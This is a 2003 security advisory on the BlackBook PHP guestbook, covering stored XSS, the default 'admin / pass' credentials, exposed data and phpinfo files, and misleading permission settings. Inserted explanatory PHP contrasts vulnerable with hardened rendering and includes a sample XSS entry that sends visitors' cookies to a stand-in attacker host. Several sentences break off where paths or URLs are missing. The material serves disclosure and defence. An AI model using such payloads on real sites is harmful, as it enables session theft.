
BlackBook - Multiple Vulnerabilities

          - EXPL-A-2003-015 Advisory 015
                                -= BlackBook =-

Donnie Werner
July 11, 2003

1. Cross-site scripting (XSS): injected JavaScript executes in visitors' browsers
2. Default and plaintext admin password
3. File permission issues (guestbook data readable)
4. phpinfo.php left exposed

EJ3 BlackBook v1.0 - S.10-VIII-2002

Description of product:
"BlackBook is a complete guestbook script with tons of features
that don't need MySQL to work. Search, compare & if you find
a guestbook better than BlackBook, use it!! Author: Emilio José

Webspace with PHP4 support.
TOPo has been developed on an Apache v1.3 + PHP v4.0.6
platform running on Windows 98 SE and has been fully tested in
Internet Explorer v5.5"

ummm.. ok. Hint: it runs on almost anything with PHP installed.

Another very popular "guestbook"-type PHP script with many flaws...

1. XSS vulnerabilities lie in almost every field EXCEPT the message.
Note that HTML is set to "off" by default in sign.php, which is why the
message field is the one field that is not affected.

The injected JavaScript is rendered / executed in the user's browser upon
a trivial visit to
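The pattern behind the stored XSS described above, shown as an added example that is not BlackBook's own code: the message field is encoded (the "HTML off" behaviour), the other fields are not, so a payload stored in name, email or homepage reaches every later visitor. The field names, the entry layout and the constructed sample entry are assumptions for illustration.

```php
<?php
// Added example, not BlackBook's code: a guestbook entry rendered with
// only the message encoded (vulnerable) and with every field encoded
// for its context (hardened). Field names and layout are assumed.

// Vulnerable: name, email and homepage go into the page untouched.
// Only the message is run through htmlspecialchars(), so any of the
// other fields carries the payload to every visitor of the guestbook.
function render_entry_vulnerable(array $e): string
{
    return '<p><b>' . $e['name'] . '</b> '
         . '<a href="mailto:' . $e['email'] . '">mail</a> '
         . '<a href="' . $e['homepage'] . '">home</a><br>'
         . htmlspecialchars($e['message'], ENT_QUOTES, 'UTF-8') . '</p>';
}

// Encode for an HTML text or attribute context. ENT_QUOTES also turns
// single quotes into entities, so the value cannot close an attribute.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

// Encoding alone does not make a URL safe inside href=: the string
// "javascript:alert(1)" contains nothing htmlspecialchars() changes.
// Accept only http and https, otherwise neutralise the link.
function safe_href(string $url): string
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'])
        || !in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return '#';
    }
    return h($url);
}

// Hardened: every field is encoded for the context it is written into.
function render_entry_hardened(array $e): string
{
    return '<p><b>' . h($e['name']) . '</b> '
         . '<a href="mailto:' . h($e['email']) . '">mail</a> '
         . '<a href="' . safe_href($e['homepage']) . '">home</a><br>'
         . h($e['message']) . '</p>';
}

// Constructed sample entry (assumption): what a hostile submission to a
// sign.php-style form could leave in the data file.
$entry = [
    'name'     => '<script>document.location="http://attacker.invalid/?c="+document.cookie</script>',
    'email'    => 'x" onmouseover="alert(1)',
    'homepage' => 'javascript:alert(document.domain)',
    'message'  => 'nice <b>site</b>',
];

// The script tag, the attribute breakout in the mailto link and the
// javascript: link all reach the visitor's browser as live markup.
echo render_entry_vulnerable($entry), "\n";

// The same entry as inert text; the homepage link degrades to "#".
echo render_entry_hardened($entry), "\n";
```

The point of the split between h() and safe_href() is that output encoding is context-specific: entity-encoding a value protects the text and attribute contexts, but a URL attribute additionally needs a scheme check, which is the part a quick "escape everything" fix tends to miss.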

2. The default user / password is "admin / pass", and it is stored in
plaintext in
3. Posts are stored in /blackbook/data/data.dat, which is not protected
by default. The stored information includes user and IP details as well
as the message contents. The setup routine appears to set a protective
permission on this file, but it does not: when set up on an NT box it
leads the user to believe it is setting permissions such as 666, 777
etc. (umm.. this ain't your father's *nix; those mode bits mean nothing
there).

4. phpinfo.php is left in place. Lets help remote enumeration some, huh?
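A post-install self-check for items 3 and 4, as an added example that is not BlackBook's setup script: it applies a mode and reads it back instead of just reporting success, refuses on Windows where chmod() mode bits are not honoured, and flags data and config files that sit under the document root, because Unix mode bits do not stop the web server from serving a file it can read; only keeping the file outside the document root (or a server-side deny rule) does. The relative paths data/data.dat, config.php and phpinfo.php are assumptions taken from the advisory text; the 0600 mode assumes the web server user owns the files.

```php
<?php
// Added example, not BlackBook's code: verify what an installer claims.
// Paths below are assumptions; DOCUMENT_ROOT comes from the web server.

// Apply a mode and read it back. On Windows, chmod() only toggles the
// read-only attribute, so claiming "set to 0600" there is fiction:
// refuse rather than pretend.
function chmod_verified(string $path, int $mode): bool
{
    if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
        return false;
    }
    if (!@chmod($path, $mode)) {
        return false;
    }
    clearstatcache(true, $path);
    return (fileperms($path) & 0777) === $mode;
}

// A file under the document root is fetchable by URL regardless of its
// Unix mode, since the server process reads it either way.
function under_document_root(string $path, string $docRoot): bool
{
    $real = realpath($path);
    $root = realpath($docRoot);
    if ($real === false || $root === false) {
        return false;
    }
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strpos($real, $prefix) === 0;
}

// Returns a list of findings; an empty list means nothing to fix.
function install_check(string $base, string $docRoot): array
{
    $findings = [];

    // Assumed sensitive files (from the advisory): guestbook data and config.
    foreach (['data/data.dat', 'config.php'] as $rel) {
        $file = $base . DIRECTORY_SEPARATOR . $rel;
        if (!is_file($file)) {
            continue;
        }
        // 0600 assumes the web server user owns the file.
        if (!chmod_verified($file, 0600)) {
            $findings[] = "$rel: could not set and verify mode 0600 (on Windows this is expected; use NTFS ACLs)";
        }
        if (under_document_root($file, $docRoot)) {
            $findings[] = "$rel: lies under the document root and can be fetched by URL; move it outside or deny it in the server config";
        }
    }

    if (is_file($base . DIRECTORY_SEPARATOR . 'phpinfo.php')) {
        $findings[] = 'phpinfo.php: remove it; it hands server and PHP configuration to anyone who asks';
    }

    return $findings;
}

// Usage: run from the installed guestbook directory. Under the CLI there
// is no DOCUMENT_ROOT, so fall back to the current directory.
$docRoot = $_SERVER['DOCUMENT_ROOT'] ?? getcwd();
foreach (install_check(__DIR__, $docRoot) as $finding) {
    echo $finding, "\n";
}
```

The read-back in chmod_verified() is the part that the advisory says the original setup lacks: reporting the mode you asked for, rather than the mode the file ended up with, is how an installer on NT convinces its user that 666 or 777 was applied.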

Plaintext credentials: yes, cleartext in config.php

Remote: yes, the XSS and the file exposures are reachable remotely

Vendor Fix:
There is no fix; this is released as a 0-day.

Vendor Contact:
Notified concurrently with this advisory.


Donnie Werner

Original advisory may be found at

